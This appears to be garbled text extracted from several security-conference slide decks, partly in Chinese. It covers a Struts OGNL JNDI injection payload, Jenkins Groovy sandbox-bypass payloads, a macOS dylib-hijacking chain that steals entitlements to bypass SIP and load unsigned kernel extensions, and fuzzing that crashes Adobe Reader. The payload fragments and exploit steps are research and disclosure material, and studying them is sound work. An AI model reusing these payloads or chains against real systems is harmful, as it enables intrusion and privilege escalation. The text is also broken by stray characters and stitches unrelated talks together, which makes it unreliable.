71、(struts.valueStack)3?OgnlValueStack?context P������oC?demoResult(#jdbc=new com.sun.rowset.JdbcRowSetImpl().(#jdbc.setDataSourceName(rmi:/127.0.0.1:1099/Exploit).(#jdbc.setAutoCommit(true)(#n=#requeststruts.actionMapping.namespace.substring(0,1).(#rmi=rmi:+#n+#n+127.0.0.1:1099+#n+Exploit).(#jdbc=new com.su
72、n.rowset.JdbcRowSetImpl().(#jdbc.setDataSourceName(#rmi).(#jdbc.setAutoCommit(true)?DemoPART 03?SandboxInterceptor?method invokenew Instancestatic methodset propertyget propertyset attributeget attri�����butesuper callset arrayget arraySecurity-1266/CVE-payload1.?2.Java?3.?SECURITY-1266SECURIT
73、Y-1292SECURITY-1318SECURITY-1319SECURITY-1320SECURITY-1321Grab(group=foo,module=bar,version=1.0)Grapes(Grab(group=foo,module=����bar,version=1.0)GrabResolver(name=restlet.org,root=http:/maven.restlet�������.org)groovy.transform.ASTTest(value=assert Jenkins.getInstance().createProject()AnnotationCollector(ASTTe
74、st)interface Lol Lol(value=import groovy.transform.ASTTest as lolwut;lolwut(value=)PART 04?Oracle?Java?Java?macOS 从运行库劫持到内核提权PART 01Attack SurfaceCONTENTSPART 02Root CausePART 03ExploitPART 04Mit�������igation01020304Why kernel exploit To overcome or disable System Integrity Protection(Rootless)File system
75�������、 protection(/System)Attaching to Apple-signed processes Enforced si��������gnature validation for KEXT Deploy Rootkits Gain more pwn pointsMotivation General approach attack kernel mode driver or XNU to control$pc,then disable SIP in kernel mode Think outside the box Is memory corruption always necessary?Do
76、 the target������� have be the kernel itself or kernel mode drivers?What about user space SIP bypass to gain kernel privilege?PART 0���1An Attack Surfacepatch kextd(osxreverser,Nov 2013)Custom build of kextload(patrickwardle,BlackHat US 2015)Old days with kext_toolsIssue 676:Logic error when exec-ing suid bin
77、aries allows code execution as root on OS X/iOS(CVE-2015-3708)Issue 353:O�����S X kextd bad path ch�����ecking and toctou allow a regular user to load an unsigned kernel extension(CVE-2015-3709)Issue 1520:MacOS double mach_port_deallocate in kextd due to failure to comply with MIG ownership rules(CVE-2018-413
78、9)Issue 676:Logic error when exec-ing suid binaries allows code execution as root on OS X/iOS(CVE-2015-3708)User mode only,logicIssue 353:OS X kextd bad path checking and toctou allow a regular user to load an unsigned kernel extensi�����on(CVE-2015-3709)User mode only,logicIssue 1520:MacOS double mach_p
79、ort_deallocate in kextd due to failure to comply with MIG ownership rules(CVE-2018-4139)User mode only,M������IG lifetimeArbitrary code execution in kextd=kernel code executionkextloadkextdXNUDoesnt matterWhat makes kextd so special Its entitlement A bundle resource containing key-value pairs that grant t
80、he executable permission to use an app service or technology A property list(XML serialized)embedded in executables code signature Some entitlements are for Apple signed binaries only“taskgate����d:killed app because its use of the com.apple.*entitlement����� is not allowed”jtool-ent/usr/libexec/kextd-arch x
81、86_64com.apple.private.KextAudit.user-accesscom.appl������e.private.allow-ble������sscom.apple.private.kernel.get-kext-infocom.apple.rootless.kext-secure-managementcom.apple.rootless.storage.KernelExtensionManagementcom.apple.security.cs.allow-unsigned-executable-memoryEntitled to call kext_requestPermission to
82、 write/Library/StagedExtensionsChecks by kextd/kextload/kextutil Implemented in function aut������henticateKext of kext_tools Check bundle permission,must be owned by root and not writable by other groups Check bundle signature:must be signed During the loading process,the bundle must be staged to a rootl
83、ess protected location:/Library/StagedExtensions(requires com.apple.rootless.storage.KernelExtensionManagement entitlement)Invoke syspolicyd to ask user for approval to load a valid signed third party extension(User-Approved Kerne�����l Extension Loading or SKEL)If SIP is disabled,some of the checks will
84、 be skippedSecure Kernel Extension Loading Even a va����lid signed kernel extension still requires user approve to load Managed by user space daemon syspolicyd,not XNU Rules stored in a SQLite database The database is protected by rootless,even root permission is insufficient to modi����fy sudo file/var/db/
85、SystemPolicyConfiguration/KextPolicy/var/db/SystemPolicyConfiguration/ExecPolicy:SQLite 3.x database,last written using SQLite�������� version 3024000 sudo xattr/var/db/SystemPolicyConfiguration/com.apple.rootless sudo sqlite3/var/db/SystemPolicyConfiguration/KextPolicySQLite ver�������sion 3.24.0 2018-06-04 14:10
86、:15Enter.help for usage hints.sqlite.tableskext_load_history_v3kext_policy_mdmkext_policysettingssqlite.header onsqlit����e select*from kext_policy;team_id|bundle_id|allowed|developer_name|flags9PTGMPNXZ2|com.symantec.kext.SymAPComm|1|Symantec|89PTGMPNXZ2|com.symantec.kext.ndcengine|1|Symantec|89PTGMPNX
87、Z2|com.symantec.kext.internetSecurity|1|Symantec|89PTGMPNXZ2|com.symantec.kext.ips|1|Symantec|8Z3L495V9L4|com.intel.kext.intelhaxm|1|Intel Corporation Apps|1VB5E2TV963|org.virtualbox.kext.VBoxDrv|1|Oracle America,Inc.|1interface KextManagerPolicy:NSObject-(BOOL)canLoadKernelExtens������ionAtURL:(id)url is
88、CacheLoad:(BOOL)cache;endinterface SPKernelExtensionPolicy:NSObject-(char)canLoadKernelExtension:(id)ext err������or:(NSErr�������or*)err;-(char)canLoadKernelExtensionInCache:(id)ext error:(NSError*)err;endkextdsyspolicydXPCPrompt/Reject/Pass based on SQLite database rulesSKEL bypass To bypass,pick any one of th
89、e following Code execution on a rootless entitl�������ed process,modify the KextPolicy database Get the task port of syspolicyd,patch-KextManagerPolicy canLoadKernelExtensionAtURL:isCacheLoad:Get the task port of kextd,patch-SPKernelExtensionPolicy canLoadKernelExtensionInCache:errorA logic ke�������rnel attack s
90、urface Neither the signature nor file permission is checked by kernel It accepts kext_request as long as the user space process has com.apple.rootless.kext-secure-management entitlement User space process kex�����td/kextutil/kextload are responsible to����� perform the signature and other validation Once you
91、own the entitlement,you rule the kernel Or you can try to obtain a task port for those entitled process(which are still protected������ by SIP)PART 02Hijack the EntitlementDLL Hijack on Windows Trick the target application to load malicious library Abuse DLL search order Abuse runtime(LoadLibrary)DLL hija
92、cking ������on trusted application to bypass UAC prompt Is there anything similar on macOS?Dylib Hijacking Use dylib hijacking to steal entitlement from Apple signed ���binaries Known techniques LC_LOAD_WEAK_DYLIB and relative rpathhttps:/ dlopen NSBundle.principalClass(dlopen internally)CFBundleLoadExecutab
93、le(dlopen internally)CFBundleLoadExecutableAndReturnError(dlopen internally)VM Regions Near 0 xdeadbf5�������7:-_TEXT 0000000108bb05000 4K r-x/rwx SM=COW /tmp/*Application Specific Information:dyld2 modeThread 0 Crashed:Dispatch queue:com.apple.main-thread0 libsystem_c.dyl��������ib0 x00007fff5da28
94、59�������c flockfile+181 libsystem_c.dylib0 x00007fff5da2b570 fwrite+662 test 0 x0000000108b04f82 main+823 libdyld.dylib0 x00007fff5d9a43d5 start+1Thread 0 crashed with X86 Thread State(64-bit):rax:0 x00000001171ee66c rbx:0 x00000000deadbeef rcx:0 x00000001171ee66c rdx:0 �������x0000000000000001SymbolicationThe b
95、ug The CoreSymbolication framework provides private APIs for symbolicating and other diagnostic information(/System/Library/PrivateFramework��������s/CoreSymbolication.framework)Under certain circumstances it will try to load a dynamic library from a controllable path When t������rying to demangle Swift symbols:C
96、oreSymbolication!call_external_demangle(char const*)More specifically,it will try to load a Swift runtime library,libswiftDemangle.dylibhandle=_dlopen(/System/Library/PrivateFrameworks/Swift/libswiftDemangle.dylib,1);if(handle=0)&(len=get_path_re������lative_to_framework_contents(././Developer/Toolchains/
97、XcodeDefault.xctoolchain/usr/lib/libswiftDemangle.dylib,alternative_path,0 x400),len=0|(handle=_dlopen(alternative_path,1),handle=0)&(len2=get_path_relative_to_framework_contents(././usr/lib/libswiftDemangle.dylib,alternative_path,0 x400),len2=0|(h�������andle=_dlopen(alternative_path,1),handle=0)handle_xc
98、select=_dlopen(/usr/lib/libxcselect.d�������ylib,1);if(handle_xcselect=0)goto cleanup;p_get_dev_dir_path=(undefined*)_dlsym(handle_xcselect,xcselect_get_developer_dir_path);if(p_get_dev_dir_path=(undefined*)0 x0)|(cVar2=(*(code*)p_get_dev_dir_path)(alternative_path,0 x400,&local_42b,&local_42a,&local_429),
99、cVar2=0)handle=0;else _strlcat(alternative_path,/Toolchains/XcodeDefault.xctoolchain/usr/lib/libswiftDemangle.dylib,0 x400);handle=_dlopen(alternative_path,1);_dlclose(handle_xcselect);if(handle=0)goto cleanup;_Z��������L25demanglerLibraryFunctions.0=_dlsym(handle,swift_demangle_getSimplifiedDemangledName);
100、insecure dlopen(dylib hijack)00001287 leardi,s_DEVELOPER_DIR_000025b9 ;=DEVELOPER_DIR0000128e call_stubs:_ge������tenv;char*_getenv(char*param_1)00001293 movr14,rAX00001296 testr14,r1400001299 jzenv_not_set0000129b movr13,rbx0000129e movrdi,r14000012a1 movrsi,r12000012a4 movebx,dword ptr local_440+rbp0000
101、12aa movedx,ebx000012ac movrcx,r15000012af call_xcselect_find_developer_contents_from_path;undefined _xcse��������lect_find_����develop000012b4 testfound,found000012b6 jzLAB_000013a6 000012bc movrdi,r12000012bf movrsi,r14000012c2 call_stubs:_strcmp;int _strcmp(char*param_1,char000012c7 testfound,found000012c9 j
102�������、zLAB_000013bb 000012cf leardi,s_DEVELOPER_DIR_000025������b9 ;=DEVELOPER_DIR000012d6 movedx,0 x1000012db movrsi,r12000012de call_stubs:_setenv;int _setenv(char*param_1,charxcselect.dylib!xcselect_get_developer_dir_pathTrigging the bug This file/System/Library/PrivateFrameworks/Swift/libswiftDemangle.dylib
103、 actually exists on High Sierra To force it to load our payload,apply a custom sandbox profile before spawning the entitled binary以子之盾 攻子之盾(version 1)(allow default)(deny file-read*(literal/System/Library/PrivateFramework��������s/Swift/libswiftDemangle.dylib)(literal/Developer/Toolchains/XcodeDefault.xctoo
104、lchain/usr/lib/libswiftDemangle.dylib)(literal/usr/lib/libswiftDemangle.dylib)Fin����d an entitled host The binary must have special entitlement that we need have at least one code path to trigger dylib hijacking A magical entitlement com.apple.system-task-ports,with whom the process can attach to any o
105、ther processes(even those restricted),and gain arbitrary entitlementcom.apple.SamplingTools ls/usr/bin/filtercalltree,heap32,stringdups32,leaks32,heap,atos,vmmap32,sample,malloc_history32,symbols,vmmap,leaks,stringdups,malloc_history/usr/bin/atos/usr/bin/l����ea�������ks32/usr/bin/stringdups32/usr/bin/filterca
106、lltree/usr/bin/malloc_history/usr/bin/symbols/usr/bin/heap/usr/bin/malloc_history32/usr/bin/vmmap/usr/bin/heap32/usr������/bin/sample/usr/bin/vmmap32/usr/bin/leaks/usr/bin/stringdups vmmap FinderProcess:Finder 245Path:/System/Library/CoreServices/Finder.app/Contents/MacOS/FinderLoad Address:0 �����x107205000Id
107、entifier:com.apple.findercom.apple.SamplingTools There are several graphical applications and command-line tools availa�������ble for gathering performance metrics.https:/ SIP exception,entitled to debug any process,including r������estricted jtool-ent which vmmapcom.apple.system-task-portsScenario Function task
108、_for_pid requires same euid,so �����we can not inject a privileged process for escalation A root process is still restricted b����ecause of System Integrity Protection Inject com.apple.rootless.*entitled processes to bypass rootless For example,com.apple.rootless.install.heritable entitlement can access rest
109、ricted files,and the entitlement is inherited by its child processesTriggering the bug Target app is written in Swift Use symbols to inspect the target app Use�������-printDemangling flag to trigger dylib hijack symbols pid-printDemangling12libdyld.dylib0 x00007fff5178ad86 dlopen+8613com.apple.CoreSymbolic
110、ation0 x00007fff3d800332 invocation function for block in call_external_demangle(char const*)+34814libdispatch.dylib0 x00007fff5174fe08����� _dispatch_client_callout+815libdispatch.dylib0 x00007fff5174fdbb dispatch_once_f+4116com.apple.CoreSymbolication0 x00007fff3d7a380f demangle+29817com.apple.CoreSymb
111、olication0 x00007fff3d7a35e3 TRawSymbol:name()+7518com.apple.CoreSymbolication0 x00007fff3d7a888e CSSymbolGetName+16619symbols 0 x000����000010ffc386a 0 x10ffb7000+5130620symbols 0 x000000010ffc3cbe 0 x10ffb7000+5�������241421com.apple.CoreSymbolication0 x00007fff3d7eba37 TRawSymbolOwnerData:symbols_in_address
112、_range(CSCppSymbolOwner*,TRange,void(_CSTy��������peRef)block_pointer)+12722symbols 0 x000000010ffc3c8e 0 x10ffb7000+5236623com.apple.CoreSymbolication0 x00007fff3d7eb890 TRawSymbolOwnerData:regions_in_address_range(CSCppSymbolOwner*,TRange,void(_CSTypeRef)block_pointer)+12424symbols 0 x000000010ffc3b6f 0 x
113、10ffb7000+52��������07925co����m.apple.CoreSymbolication0 x00007fff3d7c6c6a CSSymbolOwnerForeachSegment+9226symbols 0 x000000010ffc3af2 0 x10ffb7000+5195427com.apple.CoreSymbolication0 x00007fff3d7adbee CSSymbolicatorForeachSymbolOwnerAtTime+9528symbols 0 x000000010ffc25b1 0 x10ffb7000+4651329symbols 0 x0000000
114、10ffc00ee 0 x10ffb7000+37102Problem:Library Validation Library Validation is a protection that proh��������ibits a process to load dynamic libraries without a digital signature issued by same team id SamplingTools on High Sierra are signed with Library Validation flag,which prohibits loading modules that ar
115、e not signed by AppleSystem Integrity Protection:enable�����dCrashed Thread:0Dispatch queue:com.apple.main-threadException Type:EXC_BAD_ACCESS(Code Signature Invalid)Exception Codes:0 x0000000000000032,0 x000000010d745000Exception Note:EXC_CORPSE_NOTIFYTermination Reason:Namespace CODESIGNING,Code 0 x2�����ke
116、rnel messages:External Modification W�������arnings:Process used task_for_pid().VM Regions Near 0 x10d745000:MALLOC_LARGE000000010d70ad745000 236K rw-/rwx SM=PRV-mapped file000000010dd746000 4K r-x/r-x SM=PRVObject_id=2929ab85mapped file000000010dd762000 104K r-
117、/r-SM=ALIObject_id=2af85085Application Specific Information:dyld:in dlopen()/var/folders/4d/1_vz_55x0mn_w1cyjwr9w42c0000gn/T/tmp.0b5SeUjh/Toolchains/XcodeDefault.xctoolchain/usr/lib/libswiftD�����emangle.dylib12 libdyld.dylib 0 x00007fff66c9fd86 dlopen+8613 com.apple.CoreSymbolication 0 x00007fff52d15332
118、 invocation fun������ction for block in call_external_demangle(char const*)+34814 libdispatch.dylib 0 x00007fff66c64e08 _dispatch_client_callout+815 libd�������ispatch.dylib 0 x00007fff66c64dbb dispatch_once_f+4116 com.apple.CoreSymbolication 0 x00007fff52cb880f demangle+29817 com.apple.CoreSymbolication 0 x0000
119、7fff52cb85e3 TRawSymbol:name()+7518 com.apple.CoreSymbolication 0 x00007fff52cbd88e CSSymbolGetName+166“Im old,not obsolete”High SierraEl Capitanbin codesign-dvvv symbolsIdentifier=com.appl�����e.SamplingToolsFormat=Mach-O thin(x86_64)CodeDirectory v=20100 size=812 flags=0 x0(none)hashes=32+5 location=em
120、beddedPlatform identifier=1Hash type=sha1 size=20bin codesign-dvvv symbolsIdentifier=com.apple.SamplingToolsFormat=Mach-O thin(x86_64)CodeDirectory v=20100 s�����ize=1384 flags=0 x2000(library-validation)hashes=36+5 location=embeddedPlatform identifier=4Hash type=sha256 size=32An old binary grabbed from
121、previous OS X does not have this flag!Exploit Craft the Toolcha������ins/XcodeDefaul������t.xctoolchain/usr/lib/libswiftDemangle.dylib Invoke sandbox_init_with_parameters to drop access to the legit swift libraries Set the DEVELOPER_DIR environment variable to redirect access to our payload Copy the symbols bin
122、ary from El Capitan and spawn the process Payload libswiftDemangle.dylib will be loaded in to the entitled process,who can task_for_pid for restricted processes and obtain arbitrary entitlementrootlessSIP bypassProtectedResourcesEntitledProcessOther ProcessessandboxSampling ToolsEvil dylibLegit dy���li
123、battachPART 03To the KernelRule the Kernel Kickstart mach service com.apple.KernelExtensionServer(/usr/libexec/kextd)Get the task port to hijack the entitlements of kextd Since kextd is not library validation protected,just use the old school dyl������ib injection Directly ask kernel to load the extension
124、 Plan A:Use kext_request to send a manually crafted MKEXT pa������cket Plan B:Patch the user space checks,then call IOKit!OSKextLoadWithOptions to compose the packetKe�����rnel Code Execution without actually touching XNUXNUkextdkerneluserspaceOther ProcessessandboxSampling ToolsEvil dylibLegit dylibkext_reque
125、stattach0 1 2 3 4 5 6 7 8 9 A B C D E F 0123456789ABCDEF00000000 4d 4b 58 54 4d 4f 53 58 00������ 01 96 61 12 d4 f8 feMKXTMOSX.a.00000010 02 00 20 01 00 00 00 01 01 00 00 07 00 00 00 03.00000020 00 01 8e a4 00 00 00 00 00 00 07 bd 00 00 00 00.00000030 00 01 8e 70 cf fa ed fe 07 00 00 01 03 00 00 00.p.0000
126、0040 0b 00 00 00 08 00 00 00 a8 03 00 00 85 00 00 00.00000050 00 00 00 00 19 ��������00 00 00 38 ������01 00 00 5f 5f 54 45.8._TE00000060 58 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00XT.00018ea0 00 00 00 00 3c 64 69 63 74 3e 3c 6b 65 79 3e 4b .K00018eb0 65 78 74 20 52 65 71 75 65 73 74 20 50 72 65 64 ext Reques
127、t ������Pred00018ec0 69 63 61 74 65 3c 2f 6b 65 79 3e 3c 73 74 72 69 icateLoad00018ee0 3c 6b 65 79 3e 4b 65 78 74 20 52 65 71 75 65 73 Kext Reques00018ef0 74 20 41 72 67 75 6d 65 6e 74 73 3c 2f 6b 65 79���� t ArgumentsStar.00019640 44 52 45 46 3d 22 32 22 2f 3e 3c 2f 64 69 63 74 DREF=2/00019660 00 .MKEXT Pack
128、etmkext2_headermkext2_file_entryplistm����kext2_file_entry#define MKEXT_MAGIC 0 x4D4B5854/*MKXT*/#define MKEXT_SIGN0 x4D4F5358/*MOSX*/typedef struct mkext2_header/#define MKEXT_HEADER_COREuint32_tmagic;/always MKXTuint32_tsignature;/always MOS�������Xuint32_tlength;/the length of the whole fileuint32_tadler32;
129、/checksum from&version t�������o end of fileuint32_tversion;/a vers style valueuint32_tnumkexts;/how many kexts are in the archivecpu_type_tcputype;/same as Mach-Ocpu_subtype_t cpusubtype;/same as Mach-Ouint32_t plist_offset;uint32_t p������list_compressed_size;uint32_t plist_full_size;mkext2_header;typedef stru
130、ct mkext2_file_entry uint32_tcompressed_size;/if zero,file is not compresseduint32_tfull_size;/full si�����ze of data w/o this structuint8_tdata0;/data is inline to this struct mkext2_file_entry;The Kill-Switch KEXT Validations Code Signature KEXT Staging SKELrootless_check_trusted_classOSKextIsAuthentic
131、-SPKernelExtensionPolicy canLoadKernelExtensionInCache:errorcsr_checkLoad completely unsigned kext on macOS 10.13.6(17G65)(chained with �������CVE-2019-8565 Apple Feedback Assistant local root privilege escalation)PoC You can grab the source code herehttps:/ 04Pa������tch and MitigationThe(unintended?)patch The
132、buggy code has been removed.It only loads a hard-coded path now Released in the Developer���� Preview of macOS Mojave,before I noticed the bug on High Sierra.Looks more like code refactoring than a security fixvoid _ZL22call�����_external_demanglePKc_block_invoke(void)char*bDoNotDemangleSwift;void*handle;bDo
133、NotDemangleSwift=_getenv(CS_DO_NOT_DEMANGLE_SWIFT);if(bDoNotDema�����ngleSwift=NULL)|(byte)(*bDoNotDemangleSwift-0 x30U)(ulong)(byte)(*bDoNotDemangleSwift-0 x30U)&0 x1f)&1)!=0)handle=_dlopen(/System/Library/PrivateFrameworks/Swift/libswiftDemangle.dylib,1);if(handle!=0)_ZL25demanglerLibraryFunctions.0=_d
134、lsym(handle,swift_d���������emangle_getSimplifiedDemangledName);return;Wait,theres another bug But actually theres another dylib hijacking that still present on macOS Mojave 10.14.2 Directly triggered without any sandbox or environment string trick sudo fs_usage|grep swift10:29:53stat64/Applications/IINA.app
135、/Contents/Frameworks/libswiftRemoteMirror.dylib0�����.000020 stringdups10:29:53stat64/Applications/IINA.app/Contents/Frameworks/libswiftRemoteMirrorLegacy.dylib0.000010 stringdups10:29:53stat64/Applications/IINA.app/Contents/libswiftRemoteMirror.dylib0.000�������010 stringdups10:29:53stat64/Applications/IINA.ap
136、p/Contents/libswiftRemoteMirrorLegacy.dylib0.000008 stringdups10:29:53stat64/Applic�������ations/IINA.app/Contents/Resources/libswiftRemoteMirrorLegacy.dylib0.000017 stringdups10:29:53stat64/Developer/Toolchains/XcodeDefault.xctoolchain/usr/lib/libswiftDemangle.dylib0.001133 stringdups stringdups IINAProce
137、ss:IINA 99806Path:/Applications/IINA.app/Contents/MacOS/IINALoad Address:0 x10a422000Identifier:com.colliderli.iinaBOOL _cdecl-VMUObjectIdentifier _dlopenLib�������SwiftRemoteMirrorFromDir:(VMUObjectIdentifier���������*self,SEL a2,NSString*directory)if(!directory)return NO;if(!self-_libSwiftRemoteMirrorHandle)handl
138�����、e=dlopen(NSString stringWithFormat:%/libswiftRemoteMirror.dylib,directory UTF8String,RTLD_LAZY);.if(!self-_libSwiftRemoteMirrorLegacyHandle)handle=dlopen(NSString stringWithFormat:%/libswiftRe����moteMirrorLegacy.dylib,directory UTF8String,RTLD_LAZY);.Another dylib Hijack Bug location:/System/Library/Pr
139、ivateFrameworks/Symbolication.framework-VMUObjectIdentifier _dlopenLibSwiftRemoteMirrorFromDir:Triggered whe�����n gathering Swift runtime information with these commands heap pid stringdups pidMitigation The variant doesnt work anymore on macOS Moja������ve Hardened Runtime has been applied The old SamplingTo
140、ols binary copied from El Capitan will be enforced to have library validation,even they are signed without that flag Only the binaries entitled with com.apple.security.cs.disable-library-validation can bypass com.apple.SamplingTools ������have been renamed to have their unique identifiers(.apple.SamplingT
141、ools.vmmap),and have a new entitlement com.apple.system-task-ports.safeThanksCodeColorist2 0 1 8源于2014年的思路2014年5月29日,我们发现了一个古天乐般平平无奇的IE漏洞(CVE-2014-1792)POC非常简���单 72字节的Use-After-Free漏洞 启发 一开始无法重现 反复试验后发现拖拽文件入浏览器可触发UAF在mshtml!CDragDropManager:DragOver+0 x1f9 Fuzzer确实有乱发送鼠标键盘事件的模块 复盘发现情况,寻找原因 结论:不知道咋找到�����的(
142、摊手)类似的还有CVE-2014-1791等 有交互的漏洞似乎符合我们的期望 小众,难找,难重现 Fuzz效率低,性价比堪忧,鲜有人做 没有现成工具,一切需要从头搭建 能找到各种搞不清楚原因的漏洞结论与立项原因 简单的说 以前我们关注触发的内容,现在我们尝试�������触发的姿势 有交互要处理,没有交互制造交互也要处理 收集会引起交互的PDF元素 JS command 引起错误及安全等级相关的元素 发送会引起交互的事件 JS层面 用户输入层面 模拟用户响应思路 app.execMenuItem(xx);76 actions:GoToPage,FitPage,TwoColumns app.alert(xx)
143、cons����ole.show();this.mailDoc(true);this.mailForm(true);this.print(xx)this.saveAs(xx)this.insertPages(xx)app.launchURL(xx)引起交互的JS引起一些交互引起一些可以被Adobe Reader容忍的错误 无效的参数 不存在的对象 安全等级警告 引起一些错误引起一些错误 键盘事件 随机字符输入:圆周率映射到字符 快捷键与快捷键组合:Ctrl+H,Ctrl+L,Alt+F4 鼠标事件 鼠标移动:mouse_event()点击与拖拽:左键,右键,鼠标压下,鼠标放起 滚轮事件:滚动方向,点击
144、 系统事件与其它用户输入层面 不同的提示信息对话框 不同的按钮,确定/取消/是/否 需要输入的对话框 页面跳转:跳转到有效页面,跳转到无效页面,取消跳转 标签与选项选择:单选框,复选框,确认/应������用/取消 翻页与缩放 其它动作 全屏、打印:允许/不允许,取消,记住选择 关闭应用程序:正常退出,强制退出,取消退出进一步细分 输入随机,但可以记录随机种子来回放 记录系统环境(内存、显示设置等)记录应用程序初始与结束配置(窗口大小等)记录输入时间间隔 记录虚拟机与物理机负载 记录网络响应情况可靠重现的条件 生成混合有各种因素的PDF样本 打开后根据对话框情况模拟用户响应 没有交互时制造一些交互事件 后
145、台对每次响应与主动事件进行记录 等待并观察一段时间,看是否有crash 重复第一步整合在一起 气宗 从头开始构造文件 通过JS构造页面及页面元素 剑宗 找个模板替换掉JS 其它不知道什么宗 Dummy fuzzing然后我们谈谈样本生成 敝厂特拉维夫分厂有人在做气宗的活 我们对PDF文件格式吃得不是很透(谦虚脸)黑哥对气剑宗的屁话一直耿耿于怀 黑哥对气剑宗的屁话一直耿耿于怀 黑哥对气剑宗的屁话一������直耿耿于怀我们向剑宗低了头爬收集JS API素材 文档不全的用枚举来搜索一次(见下一页)佛系Fuzzing构建function obj(o)for(i in o)console.println(����oi);
146、obj(this);爬收集JS API素材 文档不全的用枚举来搜索一次从基础文件中搜集objects名佛系Fuzzing构建6 0 obj endobj7 0 obj endobj8 0 obj endobj21 0 obj/FT/Ch /Parent 10 0 R/Ff 1545433046/T(mydata1)/Type/Annot/Subtype/Ink/Rect 50 320 100 345/BS/H/P/AP /AA 16 0 R endobj“Text”,”BigRect”,”SmallRect”,”mydata1”爬收集JS API素材 文档不全的用枚举来搜索一次�����(见下一页)从基
147、础文件中搜集objects名混合起来生成适合基础文件的JS语句佛系Fuzzing构建JS语句库this.getField()对象库“mydata1”this.getField(“mydata1)JS语句库.setFocus()this.getField(“mydata1).setFocus�����();爬收集JS API素材 文档不全的用枚举来搜索一次从基础文件中搜集objects名混合起来生成适合基础文件的JS语句替换/插入基础文件中的JS语句佛系Fuzzing构建1 0 obj/Type/Catalog/Pages 2 0 R/OCProperties/OCGs 6 0 R 7 0 R 8 0 R
148、/D/AcroForm 10 0 R/OpenAction 40 0 R endobj40 0 obj endobj%JS program to exexute41 0 obj streamapp.alert(hmm,nice day!);endstreamendobj1 0 obj/Type/Catalog/Pages 2 0 R/OCProperties/OCGs 6 0 R 7 0 R 8 0 R/D/AcroForm 10 0 R/OpenAction 40 0 �����R endobj40 0 obj endobj%JS program to exexute41 0 obj streamth
149、is.getField(“mydata1).setFocus();endstreamendobj爬收集JS API素材文档不全的用枚举来搜索一次从基础文件中搜集objects名混合起来生成适合基础文件的JS语句替换/插入基础文件中的JS语句佛系Fuzzing构建Mutools是个好工具!Adobe������� Reader会自己升级 将前一页的步骤都自动化 通过网络共享获取基础文件 通过网络共享保存结果 自动化精简工具 GPG精简后的样本和调试信息佛系Fuzzing构建我们有五台二手服务器!我们运行了四十个虚拟机!我们都四年没升级过机器了!中间还坏/换了一块RAID卡大规模跑 点掉第一个错误信息后等待.p
150、df 稍微往下滚动鼠标.pdf 选择双页视图后滚动鼠标到第三页.pdf 确认掉�����前三个错误信息后跳转到第一页.pdf结果是我们找到了些需要交互的%PDF-1.61 0 obj/Pages 2 0 R/OCProperties /AcroForm 10 0 R/OpenAction 40 0 R40 0 obj 41 0 obj streamtryapp.execMenuItem(SinglePage);catch(e)endstream2 0 obj 3 0 obj/Resources /Annots 11 0 R 21 0 R 42 0 R4 0 obj streamendstream10 0
151、 obj 11 0 obj 21 0 obj 42 0 obj 14 0 obj 15���� 0 obj trailer Patched Sample 1(10a0.1cfc):Access violation-code c0000005(!second chance!)eax=002ad788 ebx=3cb181b8 ecx=4b3c8f38 edx=3d6fcfe8 esi=69007bfc edi=4b3c8f38eip=681cd408 esp=002ad760 ebp=002ad760 iopl=0 nv up ei pl zr na pe nccs=001b ss=0023 ds=00
152、23 es=0023 fs=003b gs=0000 efl=00010246AcroRd32_68010000!PDAlternatesGetCosObj+0 x54f78:681cd408 8b11 mov edx,dword ptr ecx ds:0023:4b3c8f38=?1:009!heap-p-a ecx address 4b3c8f38 found in _DPH_HEAP_ROOT 3a1000 in free-ed allocation(DPH_�������HEAP_BLOCK:VirtAddr VirtSize)55a21ccc:4b3c8000 2000 6f6a90b2 veri
153、fier!VerifierDisableFaultInjectionExclusionRange+0 x00003162 77ba69cc ntdll!RtlpNtMakeTemporaryKey+0 x000048b1 77b69e07 ntdll!EtwSetMark+0 x0000eb7f 77b363a6 ntdll!wcsnicmp+0 x00000caa 763bc6�����14 kernel32!HeapFree+0 x00000014 6de2ecfa MSVCR120!free+0 x0000001a 68307cdc AcroRd32_68010000!CTJPEGLibTermi
154、nate+0 x000������14b7c 68307a45 AcroRd32_68010000!CTJPEGLibTerminate+0 x000148e5 6818ef98 AcroRd32_68010000!PDAlternatesGetCosObj+0 x00016b08 6818a74b AcroRd32_68010000!PDAlternatesGetCosObj+0 x000122bb 6818a36e AcroRd32_68010000!PDAlternatesGetCosObj+0 x00011edePatched Sample 1%PDF-1.2 1 0 obj/Pages 2 0
155、R/OCProperties/D /OpenAction 40 0 R 40 0 obj/S/JavaScript/JS(app.alert(click to trigger the cra�������sh);%endobj 2 0 obj 3 0 obj/MediaBox 0 0������� 400 550/Resources/Annots 11 0 R 21 0 R 42 0 R endobj 11 0 objendobj 14 0 objendobj 15 0 objendobj trailer Patched Sample 2(1a40.840):Access violation-code c0000005(
156、first chance)First chance exceptions are reported before any exception handling.This exception may be expected and handled.ACROFORM!DllUnregisterServer+0 x107759:55bbdc02 ff734c push dword ptr ebx+4Ch ds:002b:3f07cf0c=?0:000:x86 kvChildEBP RetAddr Args to Ch�����ild WARNING:Stack unwind information not a
157、vailable.Following frames may be wrong.002ceb00 55bcfec������1 32172fa0 002ced48 55c049cf ACR�������OFORM!DllUnregisterServer+0 x107759002ceb0c 55c049cf 00000001 00000001 bbd31539 ACROFORM!DllUnregisterServer+0 x119a18002ced48 55c004c2 56366bf8 c0010000 00000005 ACROFORM!DllUnregisterServer+0 x14e526002ced64 55b
158、f7d63 56366bf8 c0010000 00000005 ACROFORM!DllUnregisterServer+0 x14a019002ceeb4 5802429c 56366978 c0010000 00000005 ACROFORM!������DllUnregisterServer+�����0 x1418ba002cef14 586d4f8b 00000000 00000000 173faef0 AcroRd32_57de0000!CTJPEGDecoderReadNextTile+0 x4fe0c002cef44 586d61fc 00000000 bb8de7b7 173faef0 Acro
159、Rd32_57de0000!AIDE:PixelPartInfo:operator=+0 x27a73b002cef90 5883b200 00000000 bb8de7f7 173fa������ef0 AcroRd32_57d������e0000!AIDE:PixelPartInfo:operator=+0 x27b9ac002cefd0 57f732c8 00000000 bb8df843 00000000 AcroRd32_57de0000!ixVectorNextHit+0 x6a578002cf064 5883b653 00000000 bb8df897 00000000 AcroRd32_57de00
